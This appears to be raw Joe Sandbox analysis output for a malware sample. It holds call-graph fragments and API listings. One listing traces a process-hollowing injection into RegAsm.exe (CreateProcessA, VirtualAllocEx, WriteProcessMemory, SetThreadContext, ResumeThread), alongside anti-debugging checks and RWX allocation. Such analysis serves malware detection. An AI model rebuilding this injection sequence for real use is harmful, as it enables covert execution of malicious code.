19685 c78b20 std::_Lockit::_Lockit 5 API calls 19684->19685 19686 c789e9 19685->19686 19687 c789ed 19686->19687 19688 c78b20 std::_Lockit::_Lockit 5 API calls 19687->19688 19689 c78a03 19688->19689 19690 c78a21 19689->19690 19691 c78b20 std::_Lockit::_Lockit 5 API calls 19690->19691 19692 c78a37 19691->19692 19693 c78a07 19692->19693 19694 c78b20 std::_Lockit::_Lockit 5 API calls 19693->19694 19695 c78a1d 19694->19695 19695->19665 19696->19584 19697->19583 19699 c79031 std::_Lockit::_Lockit 5 API calls 19698->19699 19700 c70b50 19699->19700 19709 c708ee 19700->19709 19703 c65ea2 19704 c65eb0 19703->19704 19708 c65edb codecvt 19703->19708 19705 c65ebc 19704->19705 19706 c6dbe5 std::locale::_Locimp::~_Locimp 14 API calls 19704->19706 19707 c708e3 _Yarn 15 API calls 19705->19707 19705->19708 19706->19705 19707->19708 19708->19589 19710 c708fa ___scrt_is_nonwritable_in_current_image 
19709->19710 19717 c70829 EnterCriticalSection 19710->19717 19712 c70908 19718 c70949 19712->19718 19717->19712 19743 c70aa8 19718->19743 19720 c70964 19721 c76730 __Getctype 41 API calls 19720->19721 19739 c70915 19720->19739 19722 c70971 19721->19722 19767 c79ce5 19722->19767 19725 c7099d 19728 c6daac __Getctype 11 API calls 19725->19728 19725->19739 19726 c77686 __fread_nolock 15 API calls 19727 c709c2 19726->19727 19730 c79ce5 std::_Locinfo::_Locinfo_ctor 43 API calls 19727->19730 19727->19739 19729 c70aa7 19728->19729 19731 c709de 19730->19731 19732 c709e5 19731->19732 19733 c70a00 19731->19733 19732->19725 19734 c709f7 19732->19734 19735 c7745c ___free_lconv_mon 14 API calls 19733->19735 19737 c70a2b 19733->19737 19736 c7745c ___free_lconv_mon 14 API calls 19734->19736 19735->19737 19736->19739 19738 c7745c ___free_lconv_mon 14 API calls 19737->19738 19737->19739 19738->19739 19740 c7093d 19739->19740 19877 c70871 LeaveCriticalSection 19740->19877 19742 c66054 19742->19703 19744 c70ab4 19743->19744 19745 c70ac2 19743->19745 19773 c75046 19744->19773 19788 c79923 19745->19788 19748 c70abe 19748->19720 19750 c773ff __strnicoll 14 API calls 19753 c70af4 19750->19753 19751 c70b38 19752 c6daac __Getctype 11 API calls 19751->19752 19754 c70b42 19752->19754 19755 c70b1c 19753->19755 19756 c79923 std::_Locinfo::_Locinfo_ctor 43 API calls 19753->19756 19758 c79031 std::_Lockit::_Lockit 5 API calls 19754->19758 19757 c7745c ___free_lconv_mon 14 API calls 19755->19757 19759 c70b0b 19756->19759 19760 c70b31 19757->19760 19761 c70b50 19758->19761 19762 c70b12 19759->19762 19763 c70b1e 19759->19763 19760->19720 19764 c708ee std::_Locinfo::_Locinfo_ctor 68 API calls 19761->19764 19762->19751 19762->19755 19765 c75046 std::_Locinfo::_Locinfo_ctor 65 API calls 19763->19765 19766 c70b79 19764->19766 19765->19755 19766->19720 19768 c79cf9 _Fputc 19767->19768 19833 c79960 19768->19833 19771 c6d7bb _Fputc 41 API calls 19772 c70996 19771->19772 19772->19725 19772->19726 19774 
c75070 19773->19774 19775 c7505c 19773->19775 19777 c76730 __Getctype 41 API calls 19774->19777 19776 c7127e __strnicoll 14 API calls 19775->19776 19778 c75061 19776->19778 19779 c75075 19777->19779 19780 c6da7f __strnicoll 41 API calls 19778->19780 19781 c79031 std::_Lockit::_Lockit 5 API calls 19779->19781 19782 c7506c 19780->19782 19783 c7507d 19781->19783 19782->19748 19784 c7f73f __Getctype 41 API calls 19783->19784 19785 c75082 19784->19785 19794 c7464e 19785->19794 19787 c750c4 19787->19748 19789 c79936 _Fputc 19788->19789 19805 c79678 19789->19805 19792 c6d7bb _Fputc 41 API calls 19793 c70ad9 19792->19793 19793->19750 19793->19751 19795 c7465a ___scrt_is_nonwritable_in_current_image 19794->19795 19798 c7477b 19795->19798 19797 c74666 std::_Locinfo::_Locinfo_ctor 19797->19787 19799 c773ff __strnicoll 14 API calls 19798->19799 19800 c74793 19799->19800 19801 c7745c ___free_lconv_mon 14 API calls 19800->19801 19802 c747a0 19801->19802 19803 c747e1 19802->19803 19804 c74601 std::_Locinfo::_Locinfo_ctor 65 API calls 19802->19804 19803->19797 19804->19803 19806 c7968b 19805->19806 19807 c7968f 19806->19807 19809 c796b7 19806->19809 19808 c6da02 _Fputc 41 API calls 19807->19808 19812 c796ad 19808->19812 19813 c796dc 19809->19813 19814 c79758 19809->19814 19811 c6da02 _Fputc 41 API calls 19811->19812 19812->19792 19813->19811 19813->19812 19815 c7978e 19814->19815 19816 c797c6 19815->19816 19817 c797a2 19815->19817 19828 c797bb 19815->19828 19818 c797d6 19816->19818 19820 c6e4e0 _Fputc 41 API calls 19816->19820 19819 c6da02 _Fputc 41 API calls 19817->19819 19821 c797f0 19818->19821 19822 c7980e 19818->19822 19819->19828 19820->19818 19823 c82893 std::_Locinfo::_Locinfo_ctor 5 API calls 19821->19823 19824 c79816 19822->19824 19825 c798cf 19822->19825 19823->19828 19827 c7ccae __fread_nolock MultiByteToWideChar 19824->19827 19824->19828 19826 c7ccae __fread_nolock MultiByteToWideChar 19825->19826 19825->19828 19826->19828 19829 c7984d 19827->19829 19828->19813 
19828->19828 19829->19828 19830 c79858 GetLastError 19829->19830 19830->19828 19831 c79878 19830->19831 19831->19828 19832 c7ccae __fread_nolock MultiByteToWideChar 19831->19832 19832->19828 19834 c79977 19833->19834 19835 c7997b 19834->19835 19837 c799a3 19834->19837 19836 c6da02 _Fputc 41 API calls 19835->19836 19840 c79999 19836->19840 19841 c799c5 19837->19841 19842 c79a3e 19837->19842 19839 c6da02 _Fputc 41 API calls 19839->19840 19840->19771 19841->19839 19841->19840 19843 c79a6e 19842->19843 19844 c79a7d 19843->19844 19845 c79a9b 19843->19845 19856 c79a72 19843->19856 19846 c6da02 _Fputc 41 API calls 19844->19846 19854 c79aa8 19845->19854 19866 c6e4e0 19845->19866 19846->19856 19847 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19853 c79ce3 19847->19853 19849 c79ac2 19873 c83878 19849->19873 19850 c79ae0 19851 c79af4 19850->19851 19852 c79c70 19850->19852 19851->19856 19858 c79b8e 19851->19858 19862 c79b38 19851->19862 19852->19856 19857 c7cd2a _Fputc WideCharToMultiByte 19852->19857 19853->19841 19854->19849 19854->19850 19856->19847 19857->19856 19859 c7cd2a _Fputc WideCharToMultiByte 19858->19859 19861 c79ba1 19859->19861 19860 c7cd2a _Fputc WideCharToMultiByte 19860->19856 19861->19856 19863 c79bba GetLastError 19861->19863 19862->19860 19863->19856 19864 c79bc9 19863->19864 19864->19856 19865 c7cd2a _Fputc WideCharToMultiByte 19864->19865 19865->19864 19867 c6d866 _Fputc 41 API calls 19866->19867 19868 c6e4f0 19867->19868 19869 c775f7 _Fputc 41 API calls 19868->19869 19870 c6e50d 19869->19870 19871 c77655 _Fputc 41 API calls 19870->19871 19872 c6e51a 19871->19872 19872->19854 19874 c838af std::_Locinfo::_Locinfo_ctor codecvt 19873->19874 19875 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19874->19875 19876 c83982 19875->19876 19876->19856 19877->19742 19879 c76730 __Getctype 41 API calls 19878->19879 19880 c70cbf 19879->19880 
19881 c775ca __Getctype 41 API calls 19880->19881 19882 c70ccf 19881->19882 19882->19596 19884 c76730 __Getctype 41 API calls 19883->19884 19885 c70b86 19884->19885 19886 c775ca __Getctype 41 API calls 19885->19886 19887 c70b96 19886->19887 19887->19601 19889 c76730 __Getctype 41 API calls 19888->19889 19890 c70ce4 19889->19890 19891 c775ca __Getctype 41 API calls 19890->19891 19892 c661af 19891->19892 19892->19604 19893 c71182 19892->19893 19894 c7118f 19893->19894 19895 c711ca 19893->19895 19896 c708e3 _Yarn 15 API calls 19894->19896 19895->19604 19897 c711b2 19896->19897 19897->19895 19902 c7a2fa 19897->19902 19900 c6daac __Getctype 11 API calls 19901 c711e0 19900->19901 19903 c7a316 19902->19903 19904 c7a308 19902->19904 19905 c7127e __strnicoll 14 API calls 19903->19905 19904->19903 19909 c7a330 19904->19909 19906 c7a320 19905->19906 19907 c6da7f __strnicoll 41 API calls 19906->19907 19908 c711c3 19907->19908 19908->19895 19908->19900 19909->19908 19910 c7127e __strnicoll 14 API calls 19909->19910 19910->19906 19912 c76730 __Getctype 41 API calls 19911->19912 19913 c70d0b 19912->19913 19914 c775ca __Getctype 41 API calls 19913->19914 19915 c662f6 19914->19915 19915->19612 19917 c6609f 19916->19917 19919 c62fe9 19916->19919 19918 c70b43 std::_Locinfo::_Locinfo_ctor 68 API calls 19917->19918 19918->19919 19919->19619 19919->19620 19921 c62d40 std::invalid_argument::invalid_argument 42 API calls 19920->19921 19922 c65ae3 19921->19922 19922->19637 19924 c61236 19923->19924 19925 c62ec0 43 API calls 19924->19925 19926 c61283 19925->19926 19927 c613e3 std::ios_base::_Init 19926->19927 19928 c613aa 19926->19928 19931 c62dd0 std::ios_base::_Init 43 API calls 19927->19931 19929 c613bd 19928->19929 19930 c63b00 43 API calls 19928->19930 19935 c621f0 19929->19935 19930->19929 19932 c61417 19931->19932 19933 c69ea0 CallUnexpected RaiseException 19932->19933 19934 c61425 19933->19934 19936 c62210 19935->19936 19943 c62260 19936->19943 19938 c6221a 19972 c654b0 19938->19972 
19941 c64fb0 43 API calls 19942 c62255 19941->19942 19942->19417 19944 c6599b std::_Lockit::_Lockit 7 API calls 19943->19944 19945 c6227a 19944->19945 19946 c6599b std::_Lockit::_Lockit 7 API calls 19945->19946 19950 c622b5 19945->19950 19947 c62294 19946->19947 19949 c659f3 std::_Lockit::~_Lockit 2 API calls 19947->19949 19948 c659f3 std::_Lockit::~_Lockit 2 API calls 19951 c623fd 19948->19951 19949->19950 19952 c62317 19950->19952 19953 c62302 19950->19953 19963 c623e4 19950->19963 19951->19938 19954 c69271 codecvt 16 API calls 19952->19954 19955 c659f3 std::_Lockit::~_Lockit 2 API calls 19953->19955 19957 c6231e 19954->19957 19956 c6230d 19955->19956 19956->19938 19958 c623ba 19957->19958 19962 c6599b std::_Lockit::_Lockit 7 API calls 19957->19962 19959 c623de 19958->19959 19960 c62fe0 codecvt 68 API calls 19958->19960 19961 c65f18 std::_Facet_Register 16 API calls 19959->19961 19960->19959 19961->19963 19964 c62352 19962->19964 19963->19948 19965 c62407 19964->19965 19966 c62398 19964->19966 19968 c65b7a codecvt 43 API calls 19965->19968 19967 c66048 std::_Locinfo::_Locinfo_ctor 69 API calls 19966->19967 19969 c623a3 19967->19969 19970 c62411 19968->19970 19971 c6615d __Getctype 42 API calls 19969->19971 19971->19958 19973 c62ec0 43 API calls 19972->19973 19974 c654ee 19973->19974 19975 c655b3 std::ios_base::_Init 19974->19975 19976 c65578 19974->19976 19979 c62dd0 std::ios_base::_Init 43 API calls 19975->19979 19977 c63b00 43 API calls 19976->19977 19978 c6224e 19976->19978 19977->19978 19978->19941 19980 c655e5 19979->19980 19981 c69ea0 CallUnexpected RaiseException 19980->19981 19982 c655f3 19981->19982 19984 c7439e 19983->19984 19992 c743af 19983->19992 19994 c74439 GetModuleHandleW 19984->19994 19988 c743ed 19988->18555 20001 c74239 19992->20001 19995 c743a3 19994->19995 19995->19992 19996 c7449e GetModuleHandleExW 19995->19996 19997 c744f1 19996->19997 19998 c744dd GetProcAddress 19996->19998 19999 c74504 FreeLibrary 19997->19999 20000 c7450d 19997->20000 

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,008600FF,008600EF), ref: 008602FC
                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0086030F
                                                    • Wow64GetThreadContext.KERNEL32(00000120,00000000), ref: 0086032D
                                                    • ReadProcessMemory.KERNELBASE(0000011C,?,00860143,00000004,00000000), ref: 00860351
                                                    • VirtualAllocEx.KERNELBASE(0000011C,?,?,00003000,00000040), ref: 0086037C
                                                    • TerminateProcess.KERNELBASE(0000011C,00000000), ref: 0086039B
                                                    • WriteProcessMemory.KERNELBASE(0000011C,00000000,?,?,00000000,?), ref: 008603D4
                                                    • WriteProcessMemory.KERNELBASE(0000011C,00400000,?,?,00000000,?,00000028), ref: 0086041F
                                                    • WriteProcessMemory.KERNELBASE(0000011C,?,?,00000004,00000000), ref: 0086045D
                                                    • Wow64SetThreadContext.KERNEL32(00000120,00880000), ref: 00860499
                                                    • ResumeThread.KERNELBASE(00000120), ref: 008604A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087085459.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_860000_56bDgH9sMQ.jbxd
                                                    Similarity
                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                    • API String ID: 2440066154-1257834847
                                                    • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                    • Instruction ID: d19768ddd90cdf316373c686924ea67fe9fd7274dbbf6c8cc29763ab750b749c
                                                    • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                    • Instruction Fuzzy Hash: 55B1D67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA518B94

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,00C87BE0,00000000,00000000,00000000), ref: 00C87BCF
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,00C87C86), ref: 00C87BD8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectSingleThreadWait
                                                    • String ID: C$Earth$Own head
                                                    • API String ID: 1891408510-3365287836
                                                    • Opcode ID: 9472eefce2f595e73fc526adbe4995c0c8e8cede6aa1e0fd424896ba89cfe727
                                                    • Instruction ID: 57aa185c931e81cdef0989123ededa2bc603aeb23fc6dc55dc5de20879f79e48
                                                    • Opcode Fuzzy Hash: 9472eefce2f595e73fc526adbe4995c0c8e8cede6aa1e0fd424896ba89cfe727
                                                    • Instruction Fuzzy Hash: B57122719083406BD724EF348CC5B6FB794AF45314F280B2DF8A5A6182E730E688A799

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4ca35138b953b113db3b61dd3ea584cded334510e746caaba22b61a56fab146
                                                    • Instruction ID: 6db56bed3fcc1465980a78a336bcb4c50a3011967d9c898a58051c716adcd4be
                                                    • Opcode Fuzzy Hash: a4ca35138b953b113db3b61dd3ea584cded334510e746caaba22b61a56fab146
                                                    • Instruction Fuzzy Hash: 85F0A031A202209BCF26D74CC809B8873ACEB48B51F11805AF505E7140C370DE04C7D0

                                                    Control-flow Graph

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,00C78B62,?,?,00000001,00000000,?,?,00C78DCC,00000021,FlsSetValue,00C8C5BC,00C8C5C4,00000001), ref: 00C78B16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3664257935-537541572
                                                    • Opcode ID: 2d5d7ecb9b7d007873c58d8a25be7e263caf6b0ae6dbd1551fade84b0509afea
                                                    • Instruction ID: 14b43ccc850cfad07e277f4c9883ac3d3caa60707d3046bb763daf36e5ae3621
                                                    • Opcode Fuzzy Hash: 2d5d7ecb9b7d007873c58d8a25be7e263caf6b0ae6dbd1551fade84b0509afea
                                                    • Instruction Fuzzy Hash: 6F213531A80210ABCB219B24DC88B5F3768DB01370F154126EA1EA72D0DF30EE09D7E4

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00C8706A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: fe081e50a38232a57c31b66b5d007992773047505236bf987bef0bafc3839dce
                                                    • Instruction ID: 2cdfce8887fe8636d4fbc6ff4f1f7c84e137e6535d8622162e718855491f5bb4
                                                    • Opcode Fuzzy Hash: fe081e50a38232a57c31b66b5d007992773047505236bf987bef0bafc3839dce
                                                    • Instruction Fuzzy Hash: D8F18B7150C3419FC314EF24C88066AFBE5EFC5318F244A2EF5AA9B251E730E945DB96

                                                    Control-flow Graph

                                                    APIs
                                                    • OffsetRect.USER32(00000000,00000000,00000000), ref: 00C876F6
                                                    • Polyline.GDI32(00000000,00000000,00000000), ref: 00C87713
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OffsetPolylineRect
                                                    • String ID: 0$Zatlat
                                                    • API String ID: 1418762327-1547964091
                                                    • Opcode ID: 2d65a45f8ef04fff97118387497949b9b03ac58a087ed823a75320ce4f6fc7be
                                                    • Instruction ID: 61a6a259c2577203640a844ccdcf7fc35f79207f300ff4cee0a5a1a6247859b1
                                                    • Opcode Fuzzy Hash: 2d65a45f8ef04fff97118387497949b9b03ac58a087ed823a75320ce4f6fc7be
                                                    • Instruction Fuzzy Hash: FA91C07150C3809FD320AF24C89976EBBE0AFC5318F280A2CF9D497292D775D548DB56

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateThread.KERNELBASE(?,?,Function_0001023A,00000000,?,?), ref: 00C703DF
                                                    • GetLastError.KERNEL32 ref: 00C703EB
                                                    • __dosmaperr.LIBCMT ref: 00C703F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2744730728-0

                                                    APIs
                                                    • GetLastError.KERNEL32(00C92420,0000000C), ref: 00C7024D
                                                    • ExitThread.KERNEL32 ref: 00C70254
                                                    Similarity
                                                    • API ID: ErrorExitLastThread
                                                    • String ID:
                                                    • API String ID: 1611280651-0

                                                    Control-flow Graph (rendering not preserved): basic blocks c7745c-c77495; calls RtlFreeHeap, GetLastError
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,00C7EEF0,?,00000000,?,?,00C7F191,?,00000007,?,?,00C7F68A,?,?), ref: 00C77472
                                                    • GetLastError.KERNEL32(?,?,00C7EEF0,?,00000000,?,?,00C7F191,?,00000007,?,?,00C7F68A,?,?), ref: 00C7747D
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0

                                                    Control-flow Graph (rendering not preserved): basic blocks c78b20-c78ba2; calls GetProcAddress

                                                    Control-flow Graph (rendering not preserved): basic blocks c87be0-c87d00; calls VirtualAlloc
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00C87C76
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00C809B9,00000002,00000000,?,?,?,00C809B9,?,00000000), ref: 00C80734
                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00C809B9,00000002,00000000,?,?,?,00C809B9,?,00000000), ref: 00C8075D
                                                    • GetACP.KERNEL32(?,?,00C809B9,?,00000000), ref: 00C80772
                                                    Strings
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C8097C
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00C809C5
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00C809D4
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C80A1C
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C80A3B
                                                    Similarity
                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 415426439-0
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetACP.KERNEL32(?,?,?,?,?,?,00C74DBB,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C7FFCD
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C74DBB,?,?,?,00000055,?,-00000050,?,?), ref: 00C7FFF8
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C8015B
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                    • String ID: utf8
                                                    • API String ID: 607553120-905460609
                                                    APIs
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    APIs
                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C7D52A
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7D61E
                                                    • FindClose.KERNEL32(00000000), ref: 00C7D65D
                                                    • FindClose.KERNEL32(00000000), ref: 00C7D690
                                                    Similarity
                                                    • API ID: Find$CloseFile$FirstNext
                                                    • String ID:
                                                    • API String ID: 1164774033-0
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C69946
                                                    • IsDebuggerPresent.KERNEL32 ref: 00C69A12
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C69A2B
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00C69A35
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C80373
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C803BD
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C80483
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    • API ID: InfoLocale$ErrorLast
                                                    • String ID:
                                                    • API String ID: 661929714-0
                                                    • Opcode ID: 37e2c0fcce2c9c3032f703bf63b7dc32675856e2bc1346fb3e9609995746aa04
                                                    • Instruction ID: b8e32dcbf25b4ee990fead72d3b4f3280517adcf674416ce0cc91bcc760882ae
                                                    • Opcode Fuzzy Hash: 37e2c0fcce2c9c3032f703bf63b7dc32675856e2bc1346fb3e9609995746aa04
                                                    • Instruction Fuzzy Hash: EA61B5715502079FDB68AF28CD82BBA77A8EF44308F204079E925C7581F774DA49DF58
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00C6D97B
